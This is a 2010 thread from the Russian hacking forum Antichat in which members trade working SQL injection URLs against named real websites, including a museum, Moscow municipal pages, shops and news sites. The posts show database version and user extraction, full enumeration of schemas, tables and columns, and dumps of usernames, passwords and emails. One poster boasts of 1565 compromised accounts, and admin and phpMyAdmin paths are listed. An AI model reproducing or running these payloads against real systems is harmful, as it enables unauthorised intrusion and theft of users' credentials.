ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11521  
Старый 20.02.2010, 22:13
Аватар для MenZon
MenZon
Banned
Регистрация: 14.02.2010
Сообщений: 26
Провел на форуме:
156801

Репутация: 11
Отправить сообщение для MenZon с помощью ICQ
По умолчанию

www.vshoes.ru
Код:
http://vshoes.ru/catalog.php?catid=2&index=1&tovzvetint=202&tovartik=-78700'+union+select+concat_ws(0x3a,version(),user(),database(),@@version_compile_os)--+
Database Version: 4.1.22
Database name: k2_vshoesru
User name: k2_vshoesru@localhost
 
Ответить с цитированием

  #11522  
Старый 20.02.2010, 23:53
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

админкО /admin/ в robots.txt
ось win
mg=on
ко-во атрибутов 41
есть форум 300 пользователей зарегеных
pr 3 вроде

Цитата:
http://tennis-ukraine.com/index.php?p=players&id=-218+union+select+1,2,concat_ws(version(),database( ),user(),@@version_compile_os),'4',5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41--+;-)
 
Ответить с цитированием

.museum
  #11523  
Старый 21.02.2010, 00:38
Аватар для 0x0.Injector
0x0.Injector
Новичок
Регистрация: 20.02.2010
Сообщений: 2
Провел на форуме:
22576

Репутация: 23
По умолчанию .museum

1.museum
american.naturalhistory.museum - PR=4
SQL
Код:
http://american.naturalhistory.museum/ology/features/ologist/stiassny/question.php?id=1+and+1=0+union+all+select+1,version%28%29,database%28%29,4,5,6,user%28%29,8/*
version - 5.0.41-community-log
user - ology_admin@localhost
database - ology

member
Код:
http://american.naturalhistory.museum/ology/features/ologist/stiassny/question.php?id=1+and+1=0+union+all+select+1,concat_ws%280x3a,ADJ_PART_ID_REF,NOUN_PART_ID_REF,NAME_SUFFIX,PASSWORD,HINT_WORD_ID_REF,HINTWORD,MEMBER_CREATED,LAST_LOGIN,MEMBER_STATUS%29,PASSWORD,4,5,6,MEMBER_STATUS,8+from+member+limit+0,1/*

2.museum
santelmo.donostia.museum
SQL
Код:
http://www.santelmo.donostia.museum/eus/publicacionesdeexposicionesmasinfo.php?op=5&ver=todo&titulo=&autor=&anno=&id=1+and+1=1+union+all+select+1,2,3,version%28%29,database%28%29,user%28%29,7,8,9,10,11,12
version - 5.0.51a-3ubuntu5.5
user - bbdd_museode@localhost
database - santelmo
 
Ответить с цитированием

  #11524  
Старый 21.02.2010, 01:12
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://avtoarenda.com.ua/ind.php?option=com_tourist&mid=54&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7+--+
avtoarenda_site@localhost:5.1.41:avtoarenda_site

Код:
http://www.obtainsearch.com/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,group_concat(database(),0x3a,user(),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+&tr=1
doskapost:doskapost@68.178.254.145:5.0.67.d7-ourdelta-log

Код:
http://www.avtostolica.com.ua/ind.php?id=-1+union+select+1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9+--+
news@localhost:news:5.0.51a-24+lenny2-log

Код:
http://www.siac.com.sg/details.php?id=56+union+select+1,concat(unhex(hex(user())),0x3a,unhex(hex(database())),0x3a,unhex(hex(version()))),3,4,5,6,7,8,9+--+
root@localhost:siacdb:4.1.10-standard-log

Последний раз редактировалось Seravin; 21.02.2010 в 01:20..
 
Ответить с цитированием

  #11525  
Старый 21.02.2010, 01:42
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://www.webnewshub.com/story1.php?nid=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(version(),14))+as+t+JOIN+(SELECT+NAME_CONST(version(),14))b)c)
version: 5.0.83-log
 
Ответить с цитированием

  #11526  
Старый 21.02.2010, 01:56
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
http://www.makovetskiy.ru/news.php?id=1204+or+(1,2)+in+(select+*+from(Select %20name_const(version(),1),name_const(version(),1) )eba)/*;-)
Duplicate column name '5.0.22'
 
Ответить с цитированием

  #11527  
Старый 21.02.2010, 02:28
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Перехакал))

1565 аккаунтов!)))

Код:
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(version(),0x3a,user(),0x3a,database()),3+--+&rcid=2
version: 5.0.83-log
user: webnewsadmin@boscgi1303.eigbox.net
database: webnewshub

Код:
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(schema_name),3+from+information_schema.schemata+--+&rcid=2
databases: information_schema,webnewshub

Код:
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=0x7765626e657773687562+--+&rcid=2
tables:
adv_detail
adv_master
c_category
c_subcat_master
c_subcategory
category
country
gallery
gallery_category
gallery_images
game
news_comments
news_ip_votes
news_master
news_tags
newsletter
poll_ips
poll_master
poll_options
ref_category
ref_master
rss_category
rss_feed,state
tags
user_info

Код:
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x757365725f696e666f+--+&rcid=2
user_info columns:
user_id
display_name
user_name
u_email
password
user_type
country
phone_no
reg_date
email_flag
status

Код:
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(user_name,0x3a,password,0x3a,u_email),3+from+user_info+where+user_name=0x53616e6479+--+&rcid=2

Последний раз редактировалось jokester; 21.02.2010 в 02:45.. Причина: почитай наконец 1 пост, и научись пользоваться кноакой edit =\
 
Ответить с цитированием

  #11528  
Старый 21.02.2010, 04:03
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://www.eco2000.com.br/capa/ind.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,database(),0x3a,version()),10,11,12+--+
eco2000@localhost:eco2000_noticias:5.0.89-community-log

Прикольное название)
Код:
http://www.computer-and-bees.com/board/ind.php?pn=53&id_categ=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
pavl2004_pavl@localhostavl2004_links:5.0.37

Код:
http://sillacinema.com/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+&tr=1
sillacin_test@localhost:sillacin_test:5.0.89-community

user:id,email,login,pass,name,surname,state,city,r eport
login:id,user,pass,sess,rights,rname,mail,editor
 
Ответить с цитированием

  #11529  
Старый 21.02.2010, 05:45
Аватар для Mr.Br0wn
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258

Репутация: 27
Cool

PR: 7
[+] User: root@localhost
[-] Version: 4.1.22-community-nt
Database: newenfocus

Код:
http://www.enfocus.com/flows.php?id=7+and+1=0+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13--
[+] admin panel:
Код:
http://www.enfocus.com/admin/
[+] phpMyAdmin:
Код:
http://www.enfocus.com/phpMyAdmin/

---===---

PR: 6
[+] Version: 5.0.89-community
User: sciences_cms@localhost
Database: sciences_cms

Код:
http://www.sciencescotland.org/feature.php?id=7+and+1=0+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8--
---===---

PR: 5
[+] Version: 5.0.45
User: transcoalition@localhost
Database: transcoalition

Код:
http://transitioncoalition.org/transition/assessment_review/view.php?id=7+and+1=0+union+select+1,2,concat_ws(0x3a,username,password),4,5+from+auth_user--

Последний раз редактировалось jokester; 21.02.2010 в 11:32.. Причина: поскромнее надо быть
 
Ответить с цитированием

  #11530  
Старый 21.02.2010, 18:15
Аватар для MenZon
MenZon
Banned
Регистрация: 14.02.2010
Сообщений: 26
Провел на форуме:
156801

Репутация: 11
Отправить сообщение для MenZon с помощью ICQ
По умолчанию

bes.sao.mos.ru

Код:
http://bes.sao.mos.ru/news_full.php?id=28333+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User(),0x3a,@@version_compile_os),0x71),0x71),3,4,5+LIMIT+1,1--
Database Version: 4.1.12
Database name: sao
User name: sao@chicken
OS: redhat-linux-gnu
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ